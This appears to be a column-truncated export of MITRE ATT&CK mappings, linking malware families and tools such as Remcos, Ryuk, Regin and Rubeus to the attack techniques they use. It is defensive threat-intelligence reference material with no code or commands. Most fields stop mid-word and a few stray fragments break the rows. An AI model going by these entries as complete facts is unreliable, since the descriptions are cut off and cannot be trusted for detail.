S1130 Raspberry malware--4software uses T1218.008Odbcconf attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1057 Process Di attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1055.012Process Hoattack-pat technique [Raspberry
{random value name} = “rund
S1130 Raspberry malware--4software uses T1547.001Registry Ruattack-pat technique </code>.(Citation: TrendMicr
S1130 Raspberry malware--4software uses T1218.010Regsvr32 attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1091 Replicatio attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1218.011Rundll32 attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1518.001Security S attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1027.002Software Pattack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1497.001System Cheattack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1082 System Inf attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1033 System Own attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1204 User Execuattack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1497 Virtualiza attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1071.001Web Protocattack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1102 Web Servicattack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1059.003Windows Cattack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1047 Windows M attack-pat technique [Raspberry
S0364 RawDisk tool--3ffb software uses T1485 Data Destrattack-pat technique [RawDisk](h
S0364 RawDisk tool--3ffb software uses T1561.001Disk Conteattack-pat technique [RawDisk](h
S0364 RawDisk tool--3ffb software uses T1561.002Disk Struc attack-pat technique [RawDisk](h
S0169 RawPOS malware-- software uses T1560.003Archive vi attack-pat technique [RawPOS](h
S0169 RawPOS malware-- software uses T1005 Data from attack-pat technique [RawPOS](h
S0169 RawPOS malware-- software uses T1074.001Local Data attack-pat technique Data captu
S0169 RawPOS malware-- software uses T1036.004Masquerade attack-pat technique New servic
S0169 RawPOS malware-- software uses T1543.003Windows Se attack-pat technique [RawPOS](ht
S1040 Rclone tool--5909 software uses T1560.001Archive viaattack-pat technique [Rclone](ht
S1040 Rclone tool--5909 software uses T1030 Data Transfattack-pat technique The [Rclone
S1040 Rclone tool--5909 software uses T1048.002Exfiltrati attack-pat technique [Rclone](ht
S1040 Rclone tool--5909 software uses T1048.003Exfiltrati attack-pat technique [Rclone](ht
S1040 Rclone tool--5909 software uses T1567.002Exfiltratio attack-pat technique [Rclone](ht
S1040 Rclone tool--5909 software uses T1083 File and Di attack-pat technique [Rclone](ht
S0172 Reaver malware-- software uses T1560.003Archive vi attack-pat technique [Reaver](ht
S0172 Reaver malware-- software uses T1218.002Control Pa attack-pat technique [Reaver](ht
S0172 Reaver malware-- software uses T1027.013Encrypted/attack-pat technique [Reaver](ht
S0172 Reaver malware-- software uses T1070.004File Deleti attack-pat technique [Reaver](ht
S0172 Reaver malware-- software uses T1095 Non-Applicattack-pat technique Some [Reave
S0172 Reaver malware-- software uses T1012 Query Regiattack-pat technique [Reaver](ht
S0172 Reaver malware-- software uses T1547.001Registry Ruattack-pat technique [Reaver](ht
S0172 Reaver malware-- software uses T1547.009Shortcut Mattack-pat technique [Reaver](ht
S0172 Reaver malware-- software uses T1082 System Inf attack-pat technique [Reaver](h
S0172 Reaver malware-- software uses T1016 System Netattack-pat technique [Reaver](ht
S0172 Reaver malware-- software uses T1033 System Own attack-pat technique [Reaver](ht
S0172 Reaver malware-- software uses T1071.001Web Protocattack-pat technique Some [Reave
S0172 Reaver malware-- software uses T1543.003Windows Se attack-pat technique [Reaver](ht
S0153 RedLeavesmalware--1software uses T1555.003Credential attack-pat technique [RedLeaves
S0153 RedLeavesmalware--1software uses T1574.001DLL Searchattack-pat technique [RedLeaves]
S0153 RedLeavesmalware--1software uses T1027.013Encrypted/attack-pat technique A [RedLeave
S0153 RedLeavesmalware--1software uses T1070.004File Deleti attack-pat technique [RedLeaves]
S0153 RedLeavesmalware--1software uses T1083 File and Di attack-pat technique [RedLeaves]
S0153 RedLeavesmalware--1software uses T1105 Ingress Tooattack-pat technique [RedLeaves]
S0153 RedLeavesmalware--1software uses T1571 Non-Standaattack-pat technique [RedLeaves]
S0153 RedLeavesmalware--1software uses T1547.001Registry Ruattack-pat technique [RedLeaves]
S0153 RedLeavesmalware--1software uses T1113 Screen Capattack-pat technique [RedLeaves]
S0153 RedLeavesmalware--1software uses T1547.009Shortcut Mattack-pat technique [RedLeaves]
S0153 RedLeavesmalware--1software uses T1573.001Symmetric attack-pat technique [RedLeaves]
S0153 RedLeavesmalware--1software uses T1082 System Inf attack-pat technique [RedLeaves
S0153 RedLeavesmalware--1software uses T1016 System Netattack-pat technique [RedLeaves
S0153 RedLeavesmalware--1software uses T1049 System Netattack-pat technique [RedLeaves
S0153 RedLeavesmalware--1software uses T1033 System Own attack-pat technique [RedLeaves
S0153 RedLeavesmalware--1software uses T1071.001Web Protocattack-pat technique [RedLeaves]
S0153 RedLeavesmalware--1software uses T1059.003Windows Cattack-pat technique [RedLeaves]
S0075 Reg tool--cde2 software uses T1552.002Credentialsattack-pat technique [Reg](https
S0075 Reg tool--cde2 software uses T1112 Modify Regattack-pat technique [Reg](https
S0075 Reg tool--cde2 software uses T1012 Query Regiattack-pat technique [Reg](https
S0511 RegDuke malware-- software uses T1102.002Bidirectio attack-pat technique [RegDuke](h
S0511 RegDuke malware-- software uses T1140 Deobfuscatattack-pat technique [RegDuke](h
S0511 RegDuke malware-- software uses T1027.011Fileless St attack-pat technique [RegDuke](h
S0511 RegDuke malware-- software uses T1105 Ingress Tooattack-pat technique [RegDuke](
S0511 RegDuke malware-- software uses T1112 Modify Regattack-pat technique [RegDuke](h
S0511 RegDuke malware-- software uses T1027 Obfuscatedattack-pat technique [RegDuke](h
S0511 RegDuke malware-- software uses T1059.001PowerShellattack-pat technique [RegDuke](
S0511 RegDuke malware-- software uses T1027.003Steganogr attack-pat technique [RegDuke](h
S0511 RegDuke malware-- software uses T1546.003Windows Ma attack-pat technique [RegDuke](
S0019 Regin malware--4software uses T1090.002External Prattack-pat technique [Regin](htt
S0019 Regin malware--4software uses T1071.002File Transf attack-pat technique The [Regin
S0019 Regin malware--4software uses T1564.005Hidden Fil attack-pat technique [Regin](htt
S0019 Regin malware--4software uses T1036.001Invalid Codattack-pat technique [Regin](htt
S0019 Regin malware--4software uses T1056.001Keyloggingattack-pat technique [Regin](htt
S0019 Regin malware--4software uses T1112 Modify Regattack-pat technique [Regin](htt
S0019 Regin malware--4software uses T1564.004NTFS File Aattack-pat technique The [Regin]
S0019 Regin malware--4software uses T1040 Network Snattack-pat technique [Regin](htt
S0019 Regin malware--4software uses T1095 Non-Applicattack-pat technique The [Regin
S0019 Regin malware--4software uses T1021.002SMB/Windo attack-pat technique The [Regin
S0019 Regin malware--4software uses T1071.001Web Protocattack-pat technique The [Regin
S0332 Remcos tool--7cd0 software uses T1123 Audio Captattack-pat technique [Remcos](h
S0332 Remcos tool--7cd0 software uses T1548.002Bypass Useattack-pat technique [Remcos](h
S0332 Remcos tool--7cd0 software uses T1115 Clipboard attack-pat technique [Remcos](ht
S0332 Remcos tool--7cd0 software uses T1083 File and Di attack-pat technique [Remcos](ht
S0332 Remcos tool--7cd0 software uses T1105 Ingress Tooattack-pat technique [Remcos](ht
S0332 Remcos tool--7cd0 software uses T1056.001Keyloggingattack-pat technique [Remcos](h
S0332 Remcos tool--7cd0 software uses T1112 Modify Regattack-pat technique [Remcos](ht
S0332 Remcos tool--7cd0 software uses T1027 Obfuscatedattack-pat technique [Remcos](ht
S0332 Remcos tool--7cd0 software uses T1055 Process Injattack-pat technique [Remcos](ht
S0332 Remcos tool--7cd0 software uses T1090 Proxy attack-pat technique [Remcos](ht
S0332 Remcos tool--7cd0 software uses T1059.006Python attack-pat technique [Remcos](ht
S0332 Remcos tool--7cd0 software uses T1547.001Registry Ruattack-pat technique [Remcos](h
S0332 Remcos tool--7cd0 software uses T1113 Screen Capattack-pat technique [Remcos](h
S0332 Remcos tool--7cd0 software uses T1497.001System Cheattack-pat technique [Remcos](h
S0332 Remcos tool--7cd0 software uses T1125 Video Captattack-pat technique [Remcos](h
S0332 Remcos tool--7cd0 software uses T1059.003Windows Cattack-pat technique [Remcos](h
S0375 Remexi malware--esoftware uses T1010 Applicatio attack-pat technique [Remexi](h
S0375 Remexi malware--esoftware uses T1560 Archive Coattack-pat technique [Remexi](ht
S0375 Remexi malware--esoftware uses T1115 Clipboard attack-pat technique [Remexi](ht
S0375 Remexi malware--esoftware uses T1140 Deobfuscatattack-pat technique [Remexi](ht
S0375 Remexi malware--esoftware uses T1027.013Encrypted/attack-pat technique [Remexi](ht
S0375 Remexi malware--esoftware uses T1041 Exfiltratio attack-pat technique [Remexi](ht
S0375 Remexi malware--esoftware uses T1083 File and Di attack-pat technique [Remexi](ht
S0375 Remexi malware--esoftware uses T1056.001Keyloggingattack-pat technique [Remexi](ht
S0375 Remexi malware--esoftware uses T1547.001Registry Ruattack-pat technique [Remexi](ht
S0375 Remexi malware--esoftware uses T1053.005Scheduled attack-pat technique [Remexi](ht
S0375 Remexi malware--esoftware uses T1113 Screen Capattack-pat technique [Remexi](ht
S0375 Remexi malware--esoftware uses T1059.005Visual Basiattack-pat technique [Remexi](ht
S0375 Remexi malware--esoftware uses T1071.001Web Protocattack-pat technique [Remexi](ht
S0375 Remexi malware--esoftware uses T1059.003Windows Cattack-pat technique [Remexi](ht
S0375 Remexi malware--esoftware uses T1047 Windows M attack-pat technique [Remexi](h
S0375 Remexi malware--esoftware uses T1547.004Winlogon Hattack-pat technique [Remexi](h
S0166 RemoteCMmalware-- software uses T1105 Ingress Tooattack-pat technique [RemoteCMD
S0166 RemoteCMmalware-- software uses T1053.005Scheduled attack-pat technique [RemoteCMD
S0166 RemoteCMmalware-- software uses T1569.002Service Ex attack-pat technique [RemoteCMD
S0592 RemoteUtiltool--03c6 software uses T1083 File and Di attack-pat technique [RemoteUti
S0592 RemoteUtiltool--03c6 software uses T1105 Ingress Tooattack-pat technique [RemoteUti
S0592 RemoteUtiltool--03c6 software uses T1218.007Msiexec attack-pat technique [RemoteUtil
S0592 RemoteUtiltool--03c6 software uses T1113 Screen Capattack-pat technique [RemoteUti
S0125 Remsec malware--6software uses T1071.004DNS attack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1025 Data from attack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1652 Device Drivattack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1562.004Disable or attack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1055.001Dynamic-linattack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1027.013Encrypted/attack-pat technique Some data
S0125 Remsec malware--6software uses T1048.003Exfiltrati attack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1052.001Exfiltratio attack-pat technique [Remsec](h
S0125 Remsec malware--6software uses T1068 Exploitatioattack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1070.004File Deleti attack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1083 File and Di attack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1105 Ingress Tooattack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1056.001Keyloggingattack-pat technique [Remsec](h
S0125 Remsec malware--6software uses T1087.001Local Acco attack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1059.011Lua attack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1071.003Mail Protocattack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1036.005Match Legiattack-pat technique The [Remsec
S0125 Remsec malware--6software uses T1046 Network Seattack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1095 Non-Applicattack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1556.002Password Fiattack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1057 Process Di attack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1018 Remote Sysattack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1053 Scheduled attack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1003.002Security A attack-pat technique [Remsec](h
S0125 Remsec malware--6software uses T1518.001Security S attack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1082 System Inf attack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1016 System Netattack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1049 System Netattack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1033 System Own attack-pat technique [Remsec](ht
S0125 Remsec malware--6software uses T1071.001Web Protocattack-pat technique [Remsec](ht
S0174 Respondertool--a1dd software uses T1557.001LLMNR/NBT attack-pat technique [Responder]
S0174 Respondertool--a1dd software uses T1040 Network Snattack-pat technique [Responder]
S0379 Revenge R malware-- software uses T1123 Audio Captattack-pat technique [Revenge R
S0379 Revenge R malware-- software uses T1102.002Bidirectio attack-pat technique [Revenge R
S0379 Revenge R malware-- software uses T1202 Indirect C attack-pat technique [Revenge RA
S0379 Revenge R malware-- software uses T1105 Ingress Tooattack-pat technique [Revenge RA
S0379 Revenge R malware-- software uses T1056.001Keyloggingattack-pat technique [Revenge R
S0379 Revenge R malware-- software uses T1218.005Mshta attack-pat technique [Revenge R
S0379 Revenge R malware-- software uses T1003 OS Credentattack-pat technique [Revenge RA
S0379 Revenge R malware-- software uses T1059.001PowerShellattack-pat technique [Revenge
[Revenge R RAT](https://attack
S0379 Revenge R malware-- software uses T1021.001Remote Des attack-pat technique
S0379 Revenge R malware-- software uses T1053.005Scheduled attack-pat technique [Revenge RA
S0379 Revenge R malware-- software uses T1113 Screen Capattack-pat technique [Revenge RA
S0379 Revenge R malware-- software uses T1132.001Standard Eattack-pat technique [Revenge R
S0379 Revenge R malware-- software uses T1082 System Inf attack-pat technique [Revenge R
S0379 Revenge R malware-- software uses T1016 System Netattack-pat technique [Revenge R
S0379 Revenge R malware-- software uses T1033 System Own attack-pat technique [Revenge R
S0379 Revenge R malware-- software uses T1125 Video Captattack-pat technique [Revenge R
S0379 Revenge R malware-- software uses T1059.003Windows Cattack-pat technique [Revenge R
S0379 Revenge R malware-- software uses T1547.004Winlogon Hattack-pat technique [Revenge R
S0433 Rifdoor malware-- software uses T1027.001Binary Padattack-pat technique [Rifdoor](h
S0433 Rifdoor malware-- software uses T1027.013Encrypted/attack-pat technique [Rifdoor](h
S0433 Rifdoor malware-- software uses T1204.002Malicious Fattack-pat technique [Rifdoor](
S0433 Rifdoor malware-- software uses T1547.001Registry Ruattack-pat technique [Rifdoor](
S0433 Rifdoor malware-- software uses T1566.001Spearphishattack-pat technique [Rifdoor](h
S0433 Rifdoor malware-- software uses T1573.001Symmetric attack-pat technique [Rifdoor](
S0433 Rifdoor malware-- software uses T1082 System Inf attack-pat technique [Rifdoor](h
S0433 Rifdoor malware-- software uses T1016 System Netattack-pat technique [Rifdoor](h
S0433 Rifdoor malware-- software uses T1033 System Own attack-pat technique [Rifdoor](h
S0448 Rising Sun malware-- software uses T1560.003Archive vi attack-pat technique [Rising Sun
S0448 Rising Sun malware-- software uses T1573.002Asymmetricattack-pat technique [Rising Su
S0448 Rising Sun malware-- software uses T1005 Data from attack-pat technique [Rising Su
S0448 Rising Sun malware-- software uses T1140 Deobfuscatattack-pat technique [Rising Sun
S0448 Rising Sun malware-- software uses T1027.013Encrypted/attack-pat technique Configurat
S0448 Rising Sun malware-- software uses T1041 Exfiltratio attack-pat technique [Rising Su
S0448 Rising Sun malware-- software uses T1070.004File Deleti attack-pat technique [Rising Sun
S0448 Rising Sun malware-- software uses T1083 File and Di attack-pat technique [Rising Sun
S0448 Rising Sun malware-- software uses T1564.001Hidden Fileattack-pat technique [Rising Sun
S0448 Rising Sun malware-- software uses T1070 Indicator attack-pat technique [Rising Sun
S0448 Rising Sun malware-- software uses T1016.001Internet C attack-pat technique [Rising Sun
S0448 Rising Sun malware-- software uses T1106 Native API attack-pat technique [Rising Su
S0448 Rising Sun malware-- software uses T1057 Process Di attack-pat technique [Rising Su
S0448 Rising Sun malware-- software uses T1012 Query Regiattack-pat technique [Rising Su
S0448 Rising Sun malware-- software uses T1082 System Inf attack-pat technique [Rising Sun
S0448 Rising Sun malware-- software uses T1016 System Netattack-pat technique [Rising Su
S0448 Rising Sun malware-- software uses T1033 System Own attack-pat technique [Rising Sun
S0448 Rising Sun malware-- software uses T1071.001Web Protocattack-pat technique [Rising Su
S0448 Rising Sun malware-- software uses T1059.003Windows Cattack-pat technique [Rising Su
S0400 RobbinHoomalware-- software uses T1486 Data Encryattack-pat technique [RobbinHood
S0400 RobbinHoomalware-- software uses T1562.001Disable or attack-pat technique [RobbinHood
S0400 RobbinHoomalware-- software uses T1490 Inhibit Sy attack-pat technique [RobbinHoo
S0400 RobbinHoomalware-- software uses T1070.005Network Shattack-pat technique [RobbinHoo
S0400 RobbinHoomalware-- software uses T1489 Service Stoattack-pat technique [RobbinHoo
S0400 RobbinHoomalware-- software uses T1059.003Windows Cattack-pat technique [RobbinHoo
S0270 RogueRobimalware-- software uses T1102.002Bidirectio attack-pat technique [RogueRobi
S0270 RogueRobimalware-- software uses T1027.010Command aOttack-pat technique The PowerS
S0270 RogueRobimalware-- software uses T1140 Deobfuscatattack-pat technique [RogueRobi
S0270 RogueRobimalware-- software uses T1105 Ingress Tooattack-pat technique [RogueRobin
S0270 RogueRobimalware-- software uses T1059.001PowerShellattack-pat technique [RogueRobi
S0270 RogueRobimalware-- software uses T1057 Process Di attack-pat technique [RogueRobin
S0270 RogueRobimalware-- software uses T1547.001Registry Ruattack-pat technique [RogueRobin
S0270 RogueRobimalware-- software uses T1218.010Regsvr32 attack-pat technique [RogueRobin
S0270 RogueRobimalware-- software uses T1113 Screen Capattack-pat technique [RogueRobi
S0270 RogueRobimalware-- software uses T1518.001Security S attack-pat technique [RogueRobi
S0270 RogueRobimalware-- software uses T1547.009Shortcut Mattack-pat technique [RogueRobin
S0270 RogueRobimalware-- software uses T1132.001Standard Eattack-pat technique [RogueRobin
S0270 RogueRobimalware-- software uses T1497.001System Cheattack-pat technique [RogueRobin
S0270 RogueRobimalware-- software uses T1082 System Inf attack-pat technique [RogueRobi
S0270 RogueRobimalware-- software uses T1016 System Netattack-pat technique [RogueRobin
S0270 RogueRobimalware-- software uses T1033 System Own attack-pat technique [RogueRobin
S0270 RogueRobimalware-- software uses T1059.003Windows Cattack-pat technique [RogueRobi
S0270 RogueRobimalware-- software uses T1047 Windows M attack-pat technique [RogueRobin
S1078 RotaJakiro malware--0software uses T1119 Automatedattack-pat technique Depending o
S1078 RotaJakiro malware--0software uses T1037 Boot or Logattack-pat technique Depending o
S1078 RotaJakiro malware--0software uses T1140 Deobfuscatattack-pat technique [RotaJakiro
S1078 RotaJakiro malware--0software uses T1041 Exfiltratio attack-pat technique [RotaJakiro
S1078 RotaJakiro malware--0software uses T1559 Inter-Proc attack-pat technique When execut
S1078 RotaJakiro malware--0software uses T1036.005Match Legiattack-pat technique [RotaJakiro
S1078 RotaJakiro malware--0software uses T1106 Native API attack-pat technique When execut
S1078 RotaJakiro malware--0software uses T1095 Non-Applicattack-pat technique [RotaJakiro
S1078 RotaJakiro malware--0software uses T1571 Non-Standaattack-pat technique [RotaJakiro
S1078 RotaJakiro malware--0software uses T1057 Process Di attack-pat technique [RotaJakiro
S1078 RotaJakiro malware--0software uses T1129 Shared Moattack-pat technique [RotaJakiro
S1078 RotaJakiro malware--0software uses T1132.001Standard Eattack-pat technique [RotaJakiro
S1078 RotaJakiro malware--0software uses T1573.001Symmetric attack-pat technique [RotaJakir
S1078 RotaJakiro malware--0software uses T1082 System Inf attack-pat technique [RotaJakiro
S1078 RotaJakiro malware--0software uses T1543.002Systemd Seattack-pat technique Depending o
S1078 RotaJakiro malware--0software uses T1546.004Unix Shell attack-pat technique When execut
S1078 RotaJakiro malware--0software uses T1547.013XDG Autostattack-pat technique When execut
S0090 Rover malware--6software uses T1119 Automatedattack-pat technique [Rover](htt
S0090 Rover malware--6software uses T1020 Automatedattack-pat technique [Rover](htt
S0090 Rover malware--6software uses T1005 Data from attack-pat technique [Rover](htt
S0090 Rover malware--6software uses T1025 Data from attack-pat technique [Rover](htt
S0090 Rover malware--6software uses T1083 File and Di attack-pat technique [Rover](htt
S0090 Rover malware--6software uses T1056.001Keyloggingattack-pat technique [Rover](htt
S0090 Rover malware--6software uses T1074.001Local Data attack-pat technique [Rover](htt
S0090 Rover malware--6software uses T1112 Modify Regattack-pat technique [Rover](htt
S0090 Rover malware--6software uses T1547.001Registry Ruattack-pat technique [Rover](ht
S0090 Rover malware--6software uses T1113 Screen Capattack-pat technique [Rover](ht
S1073 Royal malware-- software uses T1486 Data Encryattack-pat technique [Royal](htt
S1073 Royal malware-- software uses T1083 File and Di attack-pat technique [Royal](htt
S1073 Royal malware-- software uses T1490 Inhibit Sy attack-pat technique [Royal](ht
S1073 Royal malware-- software uses T1106 Native API attack-pat technique [Royal](ht
S1073 Royal malware-- software uses T1046 Network Seattack-pat technique [Royal](htt
S1073 Royal malware-- software uses T1135 Network Shattack-pat technique [Royal](ht
S1073 Royal malware-- software uses T1095 Non-Applicattack-pat technique [Royal](ht
S1073 Royal malware-- software uses T1566 Phishing attack-pat technique [Royal](htt
S1073 Royal malware-- software uses T1057 Process Di attack-pat technique [Royal](ht
S1073 Royal malware-- software uses T1021.002SMB/Windo attack-pat technique [Royal](ht
S1073 Royal malware-- software uses T1489 Service Stoattack-pat technique [Royal](htt
S1073 Royal malware-- software uses T1082 System Inf attack-pat technique [Royal](ht
S1073 Royal malware-- software uses T1016 System Netattack-pat technique [Royal](ht
S1071 Rubeus tool--e332 software uses T1558.004AS-REP Roaattack-pat technique [Rubeus](h
S1071 Rubeus tool--e332 software uses T1482 Domain Truattack-pat technique [Rubeus](h
S1071 Rubeus tool--e332 software uses T1558.001Golden Ticattack-pat technique [Rubeus](ht
S1071 Rubeus tool--e332 software uses T1558.003Kerberoastattack-pat technique [Rubeus](h
S1071 Rubeus tool--e332 software uses T1558.002Silver Tickeattack-pat technique [Rubeus](ht
S0358 Ruler tool--90ac software uses T1087.003Email Accoattack-pat technique [Ruler](ht
S0358 Ruler tool--90ac software uses T1137.003Outlook Foattack-pat technique [Ruler](htt
S0358 Ruler tool--90ac software uses T1137.004Outlook H attack-pat technique [Ruler](htt
S0358 Ruler tool--90ac software uses T1137.005Outlook Ruattack-pat technique [Ruler](htt
S0253 RunningRAmalware-- software uses T1560 Archive Coattack-pat technique [RunningRA
S0253 RunningRAmalware-- software uses T1070.001Clear Windattack-pat technique [RunningRAT
S0253 RunningRAmalware-- software uses T1115 Clipboard attack-pat technique [RunningRA
S0253 RunningRAmalware-- software uses T1562.001Disable or attack-pat technique [RunningRA
S0253 RunningRAmalware-- software uses T1070.004File Deleti attack-pat technique [RunningRAT
S0253 RunningRAmalware-- software uses T1056.001Keyloggingattack-pat technique [RunningRA
S0253 RunningRAmalware-- software uses T1547.001Registry Ruattack-pat technique [RunningRA
S0253 RunningRAmalware-- software uses T1082 System Inf attack-pat technique [RunningRAT
S0253 RunningRAmalware-- software uses T1059.003Windows Cattack-pat technique [RunningRAT
S0446 Ryuk malware-- software uses T1134 Access Tokattack-pat technique [Ryuk](http
S0446 Ryuk malware-- software uses T1486 Data Encryattack-pat technique [Ryuk](http
S0446 Ryuk malware-- software uses T1562.001Disable or attack-pat technique [Ryuk](http
S0446 Ryuk malware-- software uses T1078.002Domain Acattack-pat technique [Ryuk](htt
S0446 Ryuk malware-- software uses T1083 File and Di attack-pat technique [Ryuk](http
S0446 Ryuk malware-- software uses T1490 Inhibit Sy attack-pat technique [Ryuk](htt
S0446 Ryuk malware-- software uses T1036 Masqueradattack-pat technique [Ryuk](http
S0446 Ryuk malware-- software uses T1036.005Match Legiattack-pat technique [Ryuk](http
S0446 Ryuk malware-- software uses T1106 Native API attack-pat technique [Ryuk](htt
S0446 Ryuk malware-- software uses T1027 Obfuscatedattack-pat technique [Ryuk](htt
S0446 Ryuk malware-- software uses T1057 Process Di attack-pat technique [Ryuk](htt
S0446 Ryuk malware-- software uses T1055 Process Injattack-pat technique [Ryuk](htt
S0446 Ryuk malware-- software uses T1547.001Registry Ruattack-pat technique [Ryuk](htt
S0446 Ryuk malware-- software uses T1021.002SMB/Windo attack-pat technique [Ryuk](htt
S0446 Ryuk malware-- software uses T1053.005Scheduled attack-pat technique [Ryuk](htt
S0446 Ryuk malware-- software uses T1489 Service Stoattack-pat technique [Ryuk](http
S0446 Ryuk malware-- software uses T1082 System Inf attack-pat technique [Ryuk](htt
S0446 Ryuk malware-- software uses T1614.001System Lanattack-pat technique [Ryuk](htt
S0446 Ryuk malware-- software uses T1016 System Netattack-pat technique [Ryuk](http
S0446 Ryuk malware-- software uses T1205 Traffic Signattack-pat technique [Ryuk](htt
S0446 Ryuk malware-- software uses T1059.003Windows Cattack-pat technique [Ryuk](http
S0446 Ryuk malware-- software uses T1222.001Windows Fiattack-pat technique [Ryuk](htt
S0085 S-Type malware-- software uses T1070.009Clear Persiattack-pat technique [S-Type](ht
S0085 S-Type malware-- software uses T1041 Exfiltratio attack-pat technique [S-Type](ht
S0085 S-Type malware-- software uses T1008 Fallback C attack-pat technique [S-Type](ht
S0085 S-Type malware-- software uses T1070.004File Deleti attack-pat technique [S-Type](ht
S0085 S-Type malware-- software uses T1105 Ingress Tooattack-pat technique [S-Type](ht
S0085 S-Type malware-- software uses T1087.001Local Acco attack-pat technique [S-Type](ht
S0085 S-Type malware-- software uses T1136.001Local Acco attack-pat technique [S-Type](ht
S0085 S-Type malware-- software uses T1036.005Match Legiattack-pat technique [S-Type](ht
S0085 S-Type malware-- software uses T1106 Native API attack-pat technique [S-Type](h
S0085 S-Type malware-- software uses T1547.001Registry Ruattack-pat technique [S-Type](ht
S0085 S-Type malware-- software uses T1547.009Shortcut Mattack-pat technique [S-Type](h
S0085 S-Type malware-- software uses T1027.002Software Pattack-pat technique Some [S-Ty
S0085 S-Type malware-- software uses T1132.001Standard Eattack-pat technique [S-Type](ht
S0085 S-Type malware-- software uses T1082 System Inf attack-pat technique The initial
S0085 S-Type malware-- software uses T1614.001System Lanattack-pat technique [S-Type](h
S0085 S-Type malware-- software uses T1016 System Netattack-pat technique [S-Type](ht
S0085 S-Type malware-- software uses T1033 System Own attack-pat technique [S-Type](ht
S0085 S-Type malware-- software uses T1007 System Serattack-pat technique [S-Type](h
S0085 S-Type malware-- software uses T1071.001Web Protocattack-pat technique [S-Type](ht
S0085 S-Type malware-- software uses T1059.003Windows Cattack-pat technique [S-Type](ht
S0461 SDBbot malware-- software uses T1546.011Applicatio attack-pat technique [SDBbot](ht
S0461 SDBbot malware-- software uses T1005 Data from attack-pat technique [SDBbot](ht
S0461 SDBbot malware-- software uses T1140 Deobfuscatattack-pat technique [SDBbot](ht
S0461 SDBbot malware-- software uses T1055.001Dynamic-linattack-pat technique [SDBbot](ht
S0461 SDBbot malware-- software uses T1041 Exfiltratio attack-pat technique [SDBbot](ht
S0461 SDBbot malware-- software uses T1070.004File Deleti attack-pat technique [SDBbot](ht
S0461 SDBbot malware-- software uses T1083 File and Di attack-pat technique [SDBbot](ht
S0461 SDBbot malware-- software uses T1546.012Image File attack-pat technique [SDBbot](ht
S0461 SDBbot malware-- software uses T1070 Indicator attack-pat technique [SDBbot](ht
S0461 SDBbot malware-- software uses T1105 Ingress Tooattack-pat technique [SDBbot](h
S0461 SDBbot malware-- software uses T1095 Non-Applicattack-pat technique [SDBbot](ht
S0461 SDBbot malware-- software uses T1027 Obfuscatedattack-pat technique [SDBbot](ht
S0461 SDBbot malware-- software uses T1057 Process Di attack-pat technique [SDBbot](h
S0461 SDBbot malware-- software uses T1090 Proxy attack-pat technique [SDBbot](ht
S0461 SDBbot malware-- software uses T1547.001Registry Ruattack-pat technique [SDBbot](ht
S0461 SDBbot malware-- software uses T1021.001Remote Des attack-pat technique [SDBbot](ht
S0461 SDBbot malware-- software uses T1218.011Rundll32 attack-pat technique [SDBbot](ht
S0461 SDBbot malware-- software uses T1027.002Software Pattack-pat technique [SDBbot](ht
S0461 SDBbot malware-- software uses T1082 System Inf attack-pat technique [SDBbot](ht
S0461 SDBbot malware-- software uses T1614 System Locattack-pat technique [SDBbot](h
S0461 SDBbot malware-- software uses T1016 System Netattack-pat technique [SDBbot](h
S0461 SDBbot malware-- software uses T1033 System Own attack-pat technique [SDBbot](ht
S0461 SDBbot malware-- software uses T1125 Video Captattack-pat technique [SDBbot](ht
S0461 SDBbot malware-- software uses T1059.003Windows Cattack-pat technique [SDBbot](h
S0195 SDelete tool--d8d1software uses T1485 Data Destrattack-pat technique [SDelete](h
S0195 SDelete tool--d8d1software uses T1070.004File Deleti attack-pat technique [SDelete](h
S0185 SEASHARP malware-- software uses T1105 Ingress Tooattack-pat technique [SEASHARPE
S0185 SEASHARP malware-- software uses T1070.006Timestompattack-pat technique [SEASHARPE
S0185 SEASHARP malware-- software uses T1505.003Web Shell attack-pat technique [SEASHARPE
S0185 SEASHARP malware-- software uses T1059.003Windows Cattack-pat technique [SEASHARPE
S0450 SHARPSTATmalware-- software uses T1027.010Command aOttack-pat technique [SHARPSTAT
S0450 SHARPSTATmalware-- software uses T1105 Ingress Tooattack-pat technique [SHARPSTAT
S0450 SHARPSTATmalware-- software uses T1059.001PowerShellattack-pat technique [SHARPSTAT
S0450 SHARPSTATmalware-- software uses T1082 System Inf attack-pat technique [SHARPSTAT
S0450 SHARPSTATmalware-- software uses T1016 System Netattack-pat technique [SHARPSTAT
S0450 SHARPSTATmalware-- software uses T1033 System Own attack-pat technique [SHARPSTAT
